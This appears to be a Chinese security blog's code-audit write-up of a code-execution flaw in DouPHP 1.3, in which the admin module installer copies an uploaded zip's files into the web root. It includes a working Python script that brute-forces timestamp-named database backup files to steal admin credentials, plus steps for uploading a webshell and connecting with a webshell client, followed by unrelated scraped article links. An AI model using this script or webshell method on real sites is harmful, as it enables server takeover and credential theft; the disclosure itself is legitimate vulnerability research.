0x00 环境准备

DouPHP官网:http://www.douco.com/

程序源码下载:http://down.douco.com/DouPHP_1.3_Release_20171002.rar

测试网站首页:

0x01 代码分析

1、文件位置: /admin/module.php 第64-77行中:

  1. if ($rec == 'install') {
  2. // 判断是否有上传文件
  3. if ($_FILES['zipfile']['name'] == '') {
  4. $dou->dou_msg($_LANG['module_file_empty'], 'module.php?rec=local');
  5. else {
  6. $zipfile_name = preg_replace('/.zip/i', '', $_FILES['zipfile']['name']);
  7. }
  8. // CSRF防御令牌验证
  9. 10.     $firewall->check_token($_POST['token']);
  10. 11.
  11. 12.     if ($dou_upload->upload_image('zipfile', $zipfile_name))
  12. 13.         $dou->dou_header('cloud.php?rec=handle&type=module&mode=local&cloud_id=' . $zipfile_name);

14. }

这段函数中对上传的文件名进行判断,然后成功上传文件,跳转到cloud.php?rec=handle&type=module&mode=local&cloud_id=,跟进这个模块,看如何处理的

2、文件位置: /admin/cloud.php 第35-49行中,对上面获取的参数进行处理,调用handle函数,跟进去看看:

  1. if ($rec == 'handle') {
  2. $smarty->assign('ur_here', $_LANG['cloud_handle']);
  3. // 验证并获取合法的ID
  4. $cloud_id = $check->is_extend_id($_REQUEST['cloud_id']) ? $_REQUEST['cloud_id'] : '';
  5. $type = $_REQUEST['type'];
  6. $mode = $check->is_letter($_REQUEST['mode']) ? $_REQUEST['mode'] : '';
  7. $smarty->assign('type', $_LANG['cloud_' . $type]);
  8. 10.     $smarty->assign('cloud_id', $cloud_id);
  9. 11.     $smarty->assign('mode', $mode);
  10. 12.
  11. 13.     $smarty->display('cloud.htm');
  12. 14.     $GLOBALS['dou_cloud']->handle($type, $cloud_id, $mode);

15. }

3、文件位置/admin/include/cloud.class.php,第40-103行中,对handle函数进行部分摘录,前面几步STEP基本没问题,我们来看一下STEP4,调用了install函数,跟进去看看:

  1. function handle($type, $cloud_id, $mode = '') {
  2. // 基础数据
  3. $item_zip = $this->cache_dir . $cloud_id . '.zip'; // 扩展压缩包
  4. $item_dir = $this->cache_dir . $cloud_id; // 扩展目录
  5. '''
  6. // STEP1 安装条件验证
  7. // STEP2 下载压缩包,如果是本地安装则直接显示正在解压缩
  8. // STEP3 解压缩
  9. ''''
  10. 10.        // STEP4 安装模块
  11. 11.        if ($wrong = $this->install($type, $cloud_id, $mode)) {
  12. 12.            $this->dou_flush($wrong);
  13. 13.            exit;
  14. 14.        } else {
  15. 15.            $text = $mode == 'update' ? $GLOBALS['_LANG']['cloud_update_0'] : $GLOBALS['_LANG']['cloud_install_0'];
  16. 16.            $success[] = $text . $cloud_id . $GLOBALS['_LANG']['cloud_install_1'];
  17. 17.            $success[] = $this->msg_success($type, $cloud_id);
  18. 18.
  19. 19.            $this->dou_flush($success);
  20. 20.        }
  21. 21.    }

4、文件位置/admin/include/cloud.class.php,第115-133行:

  1. function install($type, $cloud_id, $mode) {
  2. global $prefix;
  3. // 基础数据
  4. $item_zip = $this->cache_dir . $cloud_id . '.zip'; // 模块压缩包
  5. $item_dir = $this->cache_dir . $cloud_id; // 模块目录
  6. $sql_install = $this->root_dir . "data/backup/$cloud_id.sql"; // 安装用的SQL文件
  7. $sql_update = $this->root_dir . "data/backup/$cloud_id" . "_update.sql"; // 升级用的SQL文件
  8. 10.     // STEP1 拷贝模块文件
  9. 11.     if ($type == 'theme') {
  10. 12.         $this->dir_action($item_dir, $this->root_dir . 'theme/' . $cloud_id);
  11. 13.     } elseif ($type == 'mobile') {
  12. 14.         $this->dir_action($item_dir, $this->root_dir . M_PATH . '/theme/' . $cloud_id);
  13. 15.     } elseif ($type == 'plugin') {
  14. 16.         $this->dir_action($item_dir, $this->root_dir . 'include/plugin/' . $cloud_id);
  15. 17.     } else {
  16. 18.         $this->dir_action($item_dir, $this->root_dir);
  17. 19.     }

最后的安装模块过程中,首页就是拷贝模块文件,因$type=module,只能进入最后一个条件,也就是复制解压缩目录下的文件到网站根目录下,导致程序在实现上存在代码执行漏洞。

综上,对所上传的zip文件名只进行简单判断,然后解压缩、安装,当攻击者提供带入恶意代码的脚本,打包为zip文件上传,将被复制到网站根目录,通过该漏洞写入webshell,执行代码,控制服务器权限。

0x02 漏洞利用

A、        如何登陆后台

1、在DouPHP中备份功能代码摘录如下:

  1. // 根据时间生成备份文件名
  2. $file_name = 'D' . date('Ymd') . 'T' . date('His');
  3. $sql_file_name = $file_name . '.sql';

2、那么形成的文件名格式如:D20180118T101433.sql,而且URL访问并没有限制,备份目录是可以访问的,存在敏感信息泄露的风险。

假如管理员做了数据库备份,那么就可以爆破数据库备份文件获取敏感信息。

通过编写Python脚本来尝试爆破,附Python脚本如下:

  1. #! /usr/bin/env python
  2. # _*_  coding:utf-8 _*_
  3. import time
  4. import requests
  5. import threadpool
  6. date= "2018-01-18 10:00:00"
  7. datelist=[]

10. def gettime():

  1. 11.     timeArray = time.strptime(date,"%Y-%m-%d %H:%M:%S")
  2. 12.     time1= int(time.mktime(timeArray))
  3. 13.     time2=int(time.time())
  4. 14.     for i in range(time1,time2):
  5. 15.         time3= time.strftime('%Y%m%d %H%M%S', time.localtime(i))
  6. 16.         datelist.append(time3)
  7. 17.     return datelist

18. def req(str):

  1. 19.     try:
  2. 20.         str1,str2=str.split()
  3. 21.         date1="D"+str1+"T"+str2
  4. 22.         url="http://127.0.0.1/data/backup/"+date1+".sql"
  5. 23.         s=requests.get(url,timeout=5)
  6. 24.         if  s.status_code==200:
  7. 25.             print u"数据库备份文件爆破成功:"
  8. 26.             print url
  9. 27.
  10. 28.     except:
  11. 29.         pass
  12. 30.

31. if __name__ == '__main__':

  1. 32.     list=gettime()
  2. 33.     pool = threadpool.ThreadPool(1000)
  3. 34.     requ = threadpool.makeRequests(req,list)
  4. 35.     [pool.putRequest(req) for req in requ]
  5. 36.     pool.wait()
  6. 37.

3、测试截图:

4、通过URL访问数据库备份文件,获取管理员账号密码。当然了,也可以尝试通过弱口令登录后台。

B、代码执行漏洞利用

1、将一句话打包为zip文件,在安装本地模块,点击现在安装,即可成功上传,

2、程序自动解压jian.zip到网站根目录下,生成jian.php

3、通过菜刀连接,成功控制网站服务器

0x03 修复建议

1、对上传的zip文件内容进行检测,对模块文件内容格式进行严格限制。

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

【代码审计】DouPHP_v1.3代码执行漏洞分析的更多相关文章

  1. [转帖]Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626)

    Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626) ADLab2019-03-15共23605人围观 ,发现 4 个不明物体安全报告漏洞 https://www.f ...

  2. 【代码审计】YUNUCMS_v1.0.6 后台代码执行漏洞分析

      0x00 环境准备 QYKCMS官网:http://www.yunucms.com 网站源码版本:YUNUCMSv1.0.6 程序源码下载:http://www.yunucms.com/Downl ...

  3. 【代码审计】大米CMS_V5.5.3 任意文件删除及代码执行漏洞分析

      0x00 环境准备 大米CMS官网:http://www.damicms.com 网站源码版本:大米CMS_V5.5.3试用版(更新时间:2017-04-15) 程序源码下载:http://www ...

  4. 【代码审计】OTCMS_PHP_V2.83_代码执行漏洞分析

      0x00 环境准备 OTCMS官网:http://otcms.com 网站源码版本:网钛CMS PHP版 V2.83 [更新于2017.12.31] 程序源码下载:http://d.otcms.c ...

  5. 【代码审计】YzmCMS_PHP_v3.6 代码执行漏洞分析

      0x00 环境准备 YzmCMS官网:http://www.yzmcms.com/ 程序源码下载:http://pan.baidu.com/s/1pKA4u99 测试网站首页: 0x01 代码分析 ...

  6. 【代码审计】大米CMS_V5.5.3 代码执行漏洞分析

      0x00 环境准备 大米CMS官网:http://www.damicms.com 网站源码版本:大米CMS_V5.5.3试用版(更新时间:2017-04-15) 程序源码下载:http://www ...

  7. 【代码审计】XYHCMS V3.5代码执行漏洞分析

      0x00 环境准备 XYHCMS官网:http://www.xyhcms.com/ 网站源码版本:XYHCMS V3.5(2017-12-04 更新) 程序源码下载:http://www.xyhc ...

  8. 【代码审计】QYKCMS_v4.3.2 后台down.php页面代码执行漏洞分析

      0x00 环境准备 QYKCMS官网:http://www.qykcms.com/ 网站源码版本:QYKCMS_v4.3.2(企业站主题) 程序源码下载:http://bbs.qingyunke. ...

  9. 【代码审计】iZhanCMS_v2.1 代码执行漏洞分析

      0x00 环境准备 iZhanCMS官网:http://www.izhancms.com 网站源码版本:爱站CMS(zend6.0) V2.1 程序源码下载:http://www.izhancms ...

随机推荐

  1. add new row to data.frame/dataframe

    df<-NULL new_row<-data.frame(colA="xxx",colB=123) df<-rbind(df,new_row)

  2. OSPF建立邻居、邻接关系 学习笔记

    Ospf中路由器之间存在两种连接关系:邻居关系和邻接关系.本博文将详细介绍这2种关系建立及工作原理. 如果两台路由器之间共享一条公共数据链路(两台路由器中间没有其它路由器,或者两台路由器之间存在虚连接 ...

  3. Python之从numpy.array保存图片

    1.用scipy import scipy scipy.misc.imsave('test.jpg', img) 2.用PIL from PIL import Image im = Image.fro ...

  4. Axiom3D:Ogre公告板集与合并批次

    在上文中,我们把Ogre里的网格分解成点线面后,我们要完成一个新的功能,在点上突出显示. 得到顶点位置后,这个功能也就是一个很简单的事,最开始是每个顶点添加一个子节点,节点上添加一个圆点. forea ...

  5. 第三百五十四节,Python分布式爬虫打造搜索引擎Scrapy精讲—数据收集(Stats Collection)

    第三百五十四节,Python分布式爬虫打造搜索引擎Scrapy精讲—数据收集(Stats Collection) Scrapy提供了方便的收集数据的机制.数据以key/value方式存储,值大多是计数 ...

  6. 简单入门dos程序

    --1.关机程序 注意:文件保存为.bat echo 晚安了,宝贝! @echo off shutdown -s -t exist --2.快捷/批量启动程序 title "程序系统启动&q ...

  7. 7月目标 socket , 一致性哈希算法 ; mongodb分片; 分布式消息队列; 中间件的使用场景

      分布式的基础:一致性哈希  路由算法的一致性hash http://www.jiacheo.org/blog/174 http://www.tuicool.com/articles/vQVbmai ...

  8. VMware克隆虚拟机后无法启动网卡

    最简单的办法: 修改这个文件:/etc/udev/rules.d/70_persistent-net.rules 把eth1修改为eth0,记下里面的mac地址 修改/etc/sysconfig/ne ...

  9. ASP.NET MVC Castle Windsor 教程

    一.[转]ASP.NET MVC中使用Castle Windsor 二.[转]Castle Windsor之组件注册 平常用Inject比较多,今天接触到了Castle Windsor.本篇就来体验其 ...

  10. mybatis 参数为String,用_parameter 取值

    mybatis 参数为String,if test读取该参数代码: <select id="getMaxDepartId" parameterType="java. ...